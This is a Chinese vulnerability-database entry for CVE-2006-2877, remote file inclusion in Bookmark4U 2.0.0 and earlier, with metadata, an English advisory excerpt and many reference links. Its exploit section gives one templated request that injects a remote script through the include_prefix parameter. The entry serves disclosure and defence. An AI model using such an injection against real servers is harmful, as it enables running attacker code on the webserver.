Bookmark4U 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110400 漏洞类型 输入验证
发布时间 2006-06-05 更新时间 2006-10-30
CVE编号 CVE-2006-2877 CNNVD-ID CNNVD-200606-140
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27976
https://cxsecurity.com/issue/WLB-2006060064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-140
|漏洞详情
Bookmark4U2.0.0及更早版本存在PHP远程文件包含漏洞,远程攻击者可通过在(1)inc/dbase.php,(2)inc/config.php,(3)inc/common.php和(4)inc/function.php内的include_prefix参数来包含任意PHP文件。注意:据报告inc目录受.htaccess文件保护,因为此问题只在特定环境或配置中出现。
|漏洞EXP
source: http://www.securityfocus.com/bid/18281/info
   
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
   
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
   
http://www.example.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
|参考资料

来源:XF
名称:bookmark4u-includeprefix-file-include(26933)
链接:http://xforce.iss.net/xforce/xfdb/26933
来源:BID
名称:18281
链接:http://www.securityfocus.com/bid/18281
来源:BUGTRAQ
名称:20060605Re:Bookmark4URemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/436027/100/0/threaded
来源:BUGTRAQ
名称:20060604Bookmark4URemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/435964/100/0/threaded
来源:OSVDB
名称:26602
链接:http://www.osvdb.org/26602
来源:OSVDB
名称:26601
链接:http://www.osvdb.org/26601
来源:OSVDB
名称:26600
链接:http://www.osvdb.org/26600
来源:OSVDB
名称:26599
链接:http://www.osvdb.org/26599
来源:SECTRACK
名称:1016224
链接:http://securitytracker.com/id?1016224
来源:SREASON
名称:1058
链接:http://securityreason.com/securityalert/1058
来源:SECUNIA
名称:19758
链接:http://secunia.com/advisories/19758